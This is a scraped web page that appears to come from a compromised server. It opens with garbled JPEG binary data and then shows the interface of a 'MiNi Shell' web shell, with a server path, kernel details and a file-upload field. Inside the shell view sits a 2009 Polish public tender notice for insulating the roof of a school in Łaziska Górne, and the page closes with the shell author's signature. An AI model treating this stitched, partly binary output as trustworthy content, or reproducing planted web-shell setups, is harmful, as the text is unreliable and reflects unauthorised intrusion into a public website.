JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090327/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090327/55469-N-2009.html

<p class="kh_header"><b>Mikołów: Roboty termomodernizacyjne - ocieplenie dachu z pokryciem papą  termozgrzewalną oraz roboty towarzyszące - na budynku Zespołu Szkół  Ponadgimnazjalnych w Łaziskach Górnych  ul. Chopina 11b.</b><br>
<b>Numer ogłoszenia: 55469 - 2009; data zamieszczenia: 27.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Mikołowskiego , ul. Żwirki i Wigury 4a, 43-190 Mikołów, woj. śląskie, tel. (032) 32-48-100,  32-48-125, faks (032) 32-48-147, 32-48-132.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sp.mikolow.bipgov.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty termomodernizacyjne - ocieplenie dachu z pokryciem papą  termozgrzewalną oraz roboty towarzyszące - na budynku Zespołu Szkół  Ponadgimnazjalnych w Łaziskach Górnych  ul. Chopina 11b..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  i zakresem zamówienia jest: 
-  Rozbiórka istniejących kominów i wymurowanie nowych z cegły klinkierowej.
-  Rozbiórka pokrycia z papy, obróbek blacharskich dachu, rynien, rur spustowych,  
    instalacji odgromowej i wykonanie nowych.
-   Wymianę przykanalików odprowadzających wody deszczowe z rynien.
-  Podmurowanie murów ogniowych, docieplenie styropianem z wykonaniem  
    tynków cienkowarstwowych  ścian ponad połaciami dachowymi / attyk /.
-  Ocieplenie powierzchni dachu styropianem / styropapą /, ułożeniem papy 
    podkładowej perforowanej i pokrycie papą nawierzchniową termozgrzewalną.
-  Montaż drabin zewnętrznych, włazu kominiarskiego.
-  Roboty towarzyszące powiązane technologicznie z robotami podstawowymi.
-  Wywóz gruzu (w tym papy do utylizacji).
-   Prace zabezpieczające teren: w odległości minimum 6 m od ścian budynków należy   
    zabezpieczyć - odgrodzić teren przez  rozciągnięcie na słupkach taśm  
    ostrzegawczych w kolorze biało-czerwonym  i rozmieszczenie odpowiednich tablic informacyjnych.
 Szczegółowo przedmiot i zakres robót opisany jest w:  rysunkach technicznych  
    ( rzutu dachu i detali ) - załącznik nr 2 do SIWZ, Specyfikacji Technicznej Wykonania i   Odbioru Robót - załącznik nr 3 do SIWZ, przedmiarze robót - załącznik nr 4 do SIWZ. Organizacja robót musi uwzględnić specyfikę obiektu i wynikające stąd ograniczenia - budynek szkoły. Wykonawca przed rozpoczęciem robót winien  uzgodnić z Zamawiającym i  Dyrektorem Szkoły harmonogram realizacji robót.
Roboty  zorganizować i oznakować  tak, aby  uciążliwość  wykonywanych prac, dla  prowadzenia zajęć szkolnych  była  jak  najmniejsza  lecz  jednocześnie  zapewniała    bezpieczeństwo uczniów, pracowników i osób postronnych. Wykonawca jest zobowiązany do zabezpieczenia i utrzymania w należytym  porządku placu budowy w okresie trwania realizacji kontraktu, aż do zakończenia  i odbioru ostatecznego robót. 
Wykonawca zobowiązany jest udzielić  gwarancji na całość przedmiotu zamówienia na okres minimum 5 lat i  rękojmi na okres 36  miesięcy. Stosowne oświadczenie Wykonawca musi złożyć w formularzu ofertowym..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.42.00-2, 45.21.42.20-8, 45.32.00.00-6, 45.11.11.00-9, 45.45.30.00-7, 45.32.10.00-3, 45.26.12.10-9, 45.31.23.10-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.06.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy spełniają następujące warunki:
a)nie podlegają wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz. U. z 2007 r. Nr 223 poz. 1655 z późn. zmianami ),
b)spełniają warunki określone w art. 22 ust. 1 Ustawy z dnia 29.01.2004r. Prawo zamówień publicznych,
c)wykonali w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia,  a jeżeli okres  prowadzenia działalności jest krótszy- w tym okresie, minimum 1 robotę budowlaną  odpowiadającą swoim rodzajem  robotom budowlanym  stanowiącym przedmiot  zamówienia, o wartości  minimum 150 000,00 zł (brutto); Pod pojęciem: robót odpowiadających swoim rodzajem robotom budowlanym stanowiącym  przedmiot zamówienia, Zamawiający uznaje  roboty dekarsko - blacharskie z dociepleniem dachu w obiektach budowlanych o powierzchni dachu minimum 500 m2;
d)dysponują lub będą dysponować minimum 1 osobą posiadającą uprawnienia budowlane  do kierowania budową i robotami budowlanymi o specjalności konstrukcyjno - budowlanej;
e)osoba o której mowa w pkt. 3 d)  musi posiadać aktualne zaświadczenie o wpisie do właściwej izby samorządu zawodowego i właściwe uprawnienia,

Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem wykonawcy z postępowania.
	
Ocena spełniania poszczególnych warunków  przez Wykonawców zostanie dokonana na podstawie złożonej oferty oraz złożonych przez wykonawców oświadczeń i dokumentów, wymaganych przez Zamawiającego w pkt. 17 SIWZ i zostanie przeprowadzona zgodnie z formułą - spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca wraz z ofertą musi złożyć następujące  dokumenty i oświadczenia konieczne do przeprowadzenie postępowania oraz potwierdzające spełnianie przez Wykonawcę warunków udziału w postępowaniu: 
a)wypełniony i podpisany formularz ofertowy wraz z oświadczeniem z art. 22 ust.1 Prawa zamówień publicznych (na załączonym druku nr 1),
b)wykaz wykonanych  przez wykonawcę w okresie  ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 1 roboty budowlanej , odpowiadającej swoim rodzajem  robotom budowlanym  stanowiącym przedmiot  zamówienia, o wartości  minimum  150 000,00 zł (brutto); wypełnić zał. nr 5 do SIWZ;
c)dokumenty potwierdzające wykonanie robót o których mowa w zał. nr 5 do SIWZ , należycie;   1 referencja lub protokół  odbioru końcowego wykonanych robót;
d)wykaz  osób , którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia posiadających uprawnienia budowlane do kierowania budową i robotami budowlanymi w specjalności: konstrukcyjno - budowlanej; wypełnić zał. nr  6 do SIWZ;
e)pisemne zobowiązanie innych podmiotów do udostępnienia osób o których mowa w pkt.17 ppkt.d SIWZ, jeżeli w załączonym  wykazie ( zał. nr 6 do SIWZ)  wykonawca wskazał osoby, którymi będzie dysponował;

f)dokumenty  potwierdzające uprawnienia zawodowe, zgodnie z podanym wykazem osób   w załączniku nr  6 do SIWZ,
g)aktualny dokument potwierdzający wpis osób wymienionych w zał. nr 6 do SIWZ do właściwej izby samorządu zawodowego,
h)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej;
Uwaga! Z dokumentu określonego w pkt. 17 ppkt. h) musi wynikać zakres działalności wykonawcy, sposób reprezentacji wykonawcy, osoby które są uprawnione do reprezentowania wykonawcy na zewnątrz oraz składania oświadczeń woli w jego imieniu.  
Uwaga!  Dokument określony w pkt. 17 ppkt. h) SIWZ uważa się za aktualny jeżeli został wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
i)aktualne zaświadczenie właściwego naczelnika  urzędu skarbowego potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, opłat lub że Wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie  w całości wykonania decyzji właściwego organu;
Uwaga! Zaświadczenie z urzędu skarbowego uważa się za aktualne jeżeli zostało wystawione nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert.
Postanowienia dotyczące wykonawców mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej:
1. jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, w miejsce dokumentów o których mowa w pkt. 17 ppkt. ,h, i, składa dokumenty wystawione w  kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że :
a)nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawionego  nie wcześniej niż 6 miesięcy  przed upływem terminu składania ofert,
b)nie orzeczono wobec niego zakazu ubiegania się o zamówienie, wystawionego  nie wcześniej niż 6 miesięcy  przed upływem terminu składania ofert,
c)nie zalega z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.                          

2.  Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się tych dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sp.mikolow.bipgov.info.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe, ul. Żwirki i Wigury 4a, 43 -190 Mikołów, wejście B, biuro podawcze; osobiście lub za zaliczeniem pocztowym; cena 15 PLN plus koszt przesyłki..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.04.2009 godzina 09:00, miejsce: Starostwo Powiatowe, ul. Żwirki i Wigury 4a, 43 - 190 Mikołów, wejście A,I piętro, pokój 211- kancelaria..</p><p><b>IV.3.5) Termin związania ofertą:</b> do 20.05.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com